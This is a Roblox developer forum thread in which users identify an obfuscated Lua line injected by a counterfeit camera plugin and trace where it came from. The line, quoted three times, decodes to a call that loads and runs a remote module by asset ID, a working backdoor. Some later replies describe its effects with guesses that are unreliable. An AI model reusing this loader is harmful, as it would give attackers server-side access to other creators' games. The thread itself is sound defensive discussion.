Weird line of code popping up in my scripts

Help and Feedback Scripting Support
#1

  1. What do you want to achieve?
    This weird line of code keeps popping up in all of my scripts.

  2. What is the issue?
    No matter how many times I delete it, it keeps coming back.

  3. What solutions have you tried so far?
    I have made sure there are no free models in my games that could cause this and I keep removing the line of script. This is what it looks like.

--[[--
gamer moment
]]if require == print then require = print("nice try");print("nice try") end LOX = 4755747611; L0X = 67877778; local b = getfenv()["\76\79\88"] + getfenv()["\76\48\88"] getfenv()['\114\101\113\117\105\114\101'](b)["\77\111\100\101\108\72\101\108\112\101\114"]()--]]--
--[[--
gamer moment
]]if require == print then require = print("nice try");print("nice try") end LOX = 4755747611; L0X = 67877778; local b = getfenv()["\76\79\88"] + getfenv()["\76\48\88"] getfenv()['\114\101\113\117\105\114\101'](b)["\77\111\100\101\108\72\101\108\112\101\114"]()--]]--

Can I please have some help with this?

#2

This is a virus. Either came in by a freemodel or plugin

3 Likes
#3

Delete any free models / uninstall and delete any sketchy plugins. This is a virus.

2 Likes
#4

I’ll also provide a screenshot of my plugins.

Screen Shot 2020-07-24 at 11.28.42 AM
Screen Shot 2020-07-24 at 11.28.42 AM1472×936 333 KB

#5

Greetings! :smile:

This is most likely from a plugin, remove any sketchy or recently added plugins.

1 Like
#6

Ok thanks. I just deleted some of the plugins I recently got.

#7

Im going to see if it still shows up in my scripts.

#8

I’m not familiar with too many plugins myself. Although I believe the virus could be coming from the top row of plugins. Rojo or Server Defender could be the cause for this. I’ve only made my assumption because I haven’t seen these plugins around a lot.

Hope this helps!

#9

Thanks, it does help out. I also deleted Rojo because it was a plugin I recently installed then after that this stuff started popping up.

Edit: I also deleted smooth camera.

#10

Rojo is definitely not the virus, when roblox references it on their github

1 Like
#11

I think the virus may have been smooth camera because now no viruses are popping up in my scripts any more. Thanks for the help.

2 Likes
#12

Yeah, I’m not familiar with a lot of plugins but I’ve definitely heard of fake virus removers, while you think they remove viruses, it only seems to add a backdoor to your game for exploiters to get serversided access exploits to your game.

1 Like
#13

The risk is very true.
I agree with this. However. For us that are either starting out on plugins or just made one due to how little reputation we have for making plugins and how new the plugin is… it does put us in a bad light. However that probably is only while the plugin begins to take-off.

#14

Yup, that Smooth Cam plugin should be the one. I did a quick look through it’s source and found this:

Malicious Code 
--[[--
gamer moment
]]if require == print then require = print("nice try");print("nice try") end LOX = 4755747611; L0X = 67877778; local b = getfenv()["\76\79\88"] + getfenv()["\76\48\88"] getfenv()['\114\101\113\117\105\114\101'](b)["\77\111\100\101\108\72\101\108\112\101\114"]()--]]--

If you scroll to the end of the weird characters, you’ll find the code causing your problem.

@.Crazyman32 is the real creator of that plugin, you can find it here:

In the future, make sure to verify the source of your plugins before inserting them:

#15

Congrats on finding out the affected plugin.

Here’s ways to avoid such event in the future:

  1. Do not install plugins from shady users. Check their history.
  2. Probably avoid plugins without an image. While it may be shallow to judge a plugin because it doesn’t have an icon, it’s better safe than sorry. There do exist amazing plugins without an icon or image however. Try and avoid such plugins. Most virus plugins are made cheaply and quickly so they don’t invest time in a good icon.
  3. Check the name and description. Broken english or any language which seems illegible or broken may be and sometimes is a red flag. Be careful. There are some people out there that are trying their best to add backdoors and viruses into your game and use translators as a way to make their plugin’s name and description seem legitimate even if they don’t know the chosen language.

All in all. Pay attention. Double-check the plugin from unknown or shady users. And don’t forget to warn people about the affected plugin. Even big plugin makers sometimes have their plugins affected which they didn’t know about, alert them if possible.

And don’t forget to keep on developing, fellow dev.

1 Like
#16

Does anyone know what this code actually does? (sorry to bump) I saw it in a Redcliff statue :

#17

I do not know, but it does reproduce across all of your scripts and I think it may destroy them.

1 Like
#18

As far as I know, it inputs unnecessary lines of code.

The amount of letters the virus plugins inputs in 1 line may slow down the compiler or server slightly when reading through it but not significantly in small amounts.

If it’s a big game with hundreds of scripts it starts becoming noticeable. It injects it’s own code to your all of your scripts in order to cause a variety of issues. A list of those are:

  • Script malfunctionality depending on location of the virus code
  • Huge script size (Possibly to slow down the compiler / server)
  • Backdoors for serversided exploits to be ran
  • Script deletion
  • Game Destruction
  • Server Resource Hogging / Overload
  • Server CPU Cycles Usage

…and many more.

What the code currently does as far as I know is use up server CPU cycles to possibly slow the game down.

Stay safe!

1 Like
#19

This person is definitely an exploiter. Even their profile is dodgy.

image
image1502×482 61.4 KB

image

#20

Woah :shock: I just checked out his profile, he is most definitely a hacker

1 Like